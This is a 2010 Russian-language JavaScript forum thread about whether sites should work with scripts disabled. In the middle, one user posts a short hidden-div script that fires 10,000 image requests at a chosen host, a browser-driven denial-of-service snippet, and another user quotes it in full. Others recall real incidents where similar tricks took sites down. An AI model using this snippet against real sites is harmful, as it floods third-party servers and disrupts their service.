Javascript-форум (https://javascript.ru/forum/)
-   Общие вопросы Javascript (https://javascript.ru/forum/misc/)
-   -   Не позволить уйти со страницы не заполнив поле. (https://javascript.ru/forum/misc/7278-ne-pozvolit-ujjti-so-stranicy-ne-zapolniv-pole.html)

PeaceCoder 26.01.2010 17:01

Цитата:

Сообщение от Tim
Мне кажется, что отключение скриптов не должно приводить к полной потере работоспособности.

Ненавязчивый JS Ваш случай вроде. Но полное отключение JS даже не представляю. Стоит отключить его как ФВ мертв и сайт нераспакуется в нормальный вид и работоспособность строить на A ? Вроде не тот век браузеров... Зачем вообще тогда JS придумали загадка получается. ;)

Kolyaj 26.01.2010 17:06

Цитата:

Сообщение от PeaceCoder
и сайт нераспакуется в нормальный вид

Что значит не распакуется?

https://addons.mozilla.org/ru/firefox/addon/722 более 6 млн загрузок, параноиков на все века хватит.

Tim 27.01.2010 08:53

Цитата:

параноиков на все века хватит
Вот и я про то же. Вы не отключаите, Ваши друзья не отключают и Вы думаете что все такие, а 6 млн думают по другому ;) JS не такая уж безобидная штука, комп может за 5 сек повесить или задосить кого нибудь.

Этот код в вашем браузере выполнит 10000 соединений с любым сайтом:
<div id="attack" style="visibility:hidden">
<script type="text/javascript">
attack_host="www.{атакуемый сайт}.com"
attack_port=80
path='index.html'
for(i=1;i<=10000;i++)
{ document.write('<img src="http://' + attack_host + ':' + attack_port + '/' + path + '?' +  Math.random() + '">');}
</script></div>

P.S.: скрипт представлен только для ознакомнения ;)

Kolyaj 27.01.2010 09:44

Цитата:

Сообщение от Tim
Этот код в вашем браузере выполнит 10000 соединений с любым сайтом:

Случай был, по-моему с вконтактиком, но могу ошибаться. Тогда ещё аудитория у него была не такая огромная, но уже большая. В какой-то рейтинг интернет-проектов владельцы добавили вконтакте, чему Дуров и Ко (если это был все-таки вконтакте :), но это не важно) были по каким-то причинам не очень рады. На просьбу удалить сайт из рейтинга обратной реакции не последовало. Тогда на главной странице вконтактов в каждую десятую загрузку была добавлена картинка с src главной страницы того рейтинга. Рейтинг, разумеется, лёг.

Ещё одна поучительная история. Однажды, году так ближе к 2000, Яндекс решил поздравить своего бессменного дизайнера Артемия Татьяновича то ли с его ДР, то ли с ДР его студии. В этот день каждая десятая поисковая подсказка на морде Яндекса была подобрана так, что на первом месте был сайт студии. В середине дня сайт лёг.

История из моей уже практики, хоть и не совсем по теме. У нас ошибки JS одного из скриптов логируются на сервере. Т.е. при возникновении ошибки сообщение об этом и информация об окружении посылаются на сервер, а пользователь ничего не замечает. И вот я как-то сильно налажал в этом скрипте, в результате чего любая страница с этим скриптом, загруженная в IE, генерировала кучу ошибок. От остальных история отличается тем, что наш nginx 1400 одновременных запросов в течение где-то суток выдержал :)

Tim 27.01.2010 14:30

Цитата:

в каждую десятую загрузку была добавлена картинка с src главной страницы того рейтинга
Норм. придумали, культурный способ доса.

sdff 27.01.2010 14:40

Цитата:

Сообщение от Tim (Сообщение 42243)
Вот и я про то же. Вы не отключаите, Ваши друзья не отключают и Вы думаете что все такие, а 6 млн думают по другому ;) JS не такая уж безобидная штука, комп может за 5 сек повесить или задосить кого нибудь.

Этот код в вашем браузере выполнит 10000 соединений с любым сайтом:
<div id="attack" style="visibility:hidden">
<script type="text/javascript">
attack_host="www.{атакуемый сайт}.com"
attack_port=80
path='index.html'
for(i=1;i<=10000;i++)
{ document.write('<img src="http://' + attack_host + ':' + attack_port + '/' + path + '?' +  Math.random() + '">');}
</script></div>

P.S.: скрипт представлен только для ознакомнения ;)

Жесть!

Tim 27.01.2010 16:39

Цитата:

Жесть!
Это ерунда. С помощью VBScript можно даже сидюки открывать. Так что возможно 6 млн не такие уж и параноики ;)

Gvozd 27.01.2010 17:20

Цитата:

Сообщение от Tim
С помощью VBScript можно даже сидюки открывать.

аах
представляется картина, системника пожирающего человека посредством сидюка.ептыть
Цитата:

Сообщение от Kolyaj
Случай был, по-моему с вконтактиком, но могу ошибаться.

с ним родимым, все так и было

Tim 27.01.2010 17:34

Цитата:

представляется картина, системника пожирающего человека посредством сидюка.ептыть
даёшь восстание машин!

e1f 27.01.2010 17:48

Цитата:

Сообщение от Gvozd (Сообщение 42355)
представляется картина, системника пожирающего человека посредством сидюка.ептыть

Фуф, как знал -- ноут без сидюка брал :)


Часовой пояс GMT +3, время: 18:24.